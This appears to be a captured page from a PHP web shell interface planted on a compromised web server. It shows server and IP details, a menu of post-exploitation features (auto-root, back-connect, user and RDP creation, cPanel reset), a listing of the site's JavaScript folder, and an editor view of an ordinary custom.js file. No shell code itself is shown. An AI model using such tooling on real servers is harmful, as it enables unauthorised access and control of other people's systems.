Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.70.111.168
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
cbdpackaginghub.com /
assets /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
bootstrap.native-master
[ DIR ]
drwxr-xr-x
own-carousel-1.0.0
[ DIR ]
drwxr-xr-x
blog.js
120
B
-rw-r--r--
bootstrap.bundle.min.js
77.74
KB
-rw-r--r--
bootstrap.min.js
61.98
KB
-rw-r--r--
category_page.js
184
B
-rw-r--r--
check_overflow.js
2.36
KB
-rw-r--r--
custom.js
4.3
KB
-rw-r--r--
detail_page.js
0
B
-rw-r--r--
easyzoom.js
3.98
KB
-rw-r--r--
gtag.js
146
B
-rw-r--r--
head.js.php
209
B
-rw-r--r--
home_scripts.js
1.68
KB
-rw-r--r--
jquery-3.6.js
126.34
KB
-rw-r--r--
jquery.js
86.76
KB
-rw-r--r--
lightslider.js
46.96
KB
-rw-r--r--
owl.carousel.min.js
52.6
KB
-rw-r--r--
popper.min.js
20.76
KB
-rw-r--r--
script.js
4.34
KB
-rw-r--r--
showmoreless.js
6.07
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : custom.js
// Main menu js function myFunctionmenu() { var x = document.getElementById("myTopnav"); if (x.className === "topnav") { x.className += " responsive"; $('.icon').removeClass('bars-menu').addClass('close-menu') $('.col-9').removeClass('menu-nav-bar') } else { x.className = "topnav"; $('.icon').removeClass('close-menu').addClass('bars-menu') $('.col-9').removeClass('menu-nav-bar') } } // Instantiate EasyZoom instances var $easyzoom = $('.easyzoom').easyZoom(); // Setup thumbnails example var api1 = $easyzoom.filter('.easyzoom--with-thumbnails').data('easyZoom'); $('.thumbnails-product').on('click', 'a', function(e) { var $this = $(this); e.preventDefault(); // Use EasyZoom's `swap` method api1.swap($this.data('standard'), $this.attr('href')); }); // Setup toggles example var api2 = $easyzoom.filter('.easyzoom--with-toggle').data('easyZoom'); $('.toggle').on('click', function() { var $this = $(this); if ($this.data("active") === true) { $this.text("Switch on").data("active", false); api2.teardown(); } else { $this.text("Switch off").data("active", true); api2._init(); } }); // See more See less Product Details function myFunctionproductdetails() { var dots = document.getElementById("dots"); var moreText = document.getElementById("more-details"); var btnText = document.getElementById("myBtn-more"); if (dots.style.display === "none") { dots.style.display = "inline"; btnText.innerHTML = "see more"; moreText.style.display = "none"; } else { dots.style.display = "none"; btnText.innerHTML = "see less"; moreText.style.display = "inline"; } } // See more See less Product Description function myFunction1() { var dots = document.getElementById("dots1"); var moreText = document.getElementById("more-des"); var btnText = document.getElementById("myBtn-des"); if (dots.style.display === "none") { dots.style.display = "inline"; btnText.innerHTML = "see more"; moreText.style.display = "none"; } else { dots.style.display = "none"; btnText.innerHTML = "see less"; moreText.style.display = "inline"; } } // Product Slider $(document).ready(function() { }); // Menu FOrm Popup $(document).ready(function() { $("#formButton, #buy-slider").click(function() { $(".form-section-popup").fadeToggle("slow"); $('#fullname').focus(); }); }); // mega menu var mq = window.matchMedia("(max-width: 764px)"); if (mq.matches) { $(document).ready(function() { $('.dis-on-desktop1').click(function() { $('.dropdown-content').fadeToggle(200, function() {}) }) }) } else { $(document).ready(function() { $('.dis-on-desktop1').hover(function() { $('.dropdown-content').slideToggle(0, function() {}) }) }) } // $(document).ready(function() { // $('#dropdownMenuLink').click(function() { // $('.dropdown-content12').fadeToggle(400, function() {}) // }) // }) // header form Popup $(document).ready(function() { $("#inquire-btn").click(function() { $(".form-section-popup").fadeToggle("slow"); $('#fullname').focus(); }); }); // sticky navbar // window.onscroll = function() { myFunction() }; // var navbar = document.getElementById("header"); // var sticky = navbar.offsetTop; // function myFunction() { // if (window.pageYOffset >= sticky) { // navbar.classList.add("sticky") // } else { // navbar.classList.remove("sticky"); // } // } $(window).scroll(function() { var scroll = $(window).scrollTop(); //>=, not <= if (scroll >= 200) { //clearHeader, not clearheader - caps H $(".header-main").addClass("sticky"); $(".slider-banner").addClass("sticky-space-for-slider"); } else { //clearHeader, not clearheader - caps H $(".header-main").removeClass("sticky"); $(".slider-banner").removeClass("sticky-space-for-slider"); } }); $(document).ready(function(e){ $('.show-less-div-2').myOwnLineShowMoreLess({ showLessLine:3 }); }); $(document).ready(function(e){ $('.show-less-div-2s').myOwnLineShowMoreLess({ showLessLine:10 }); });
Close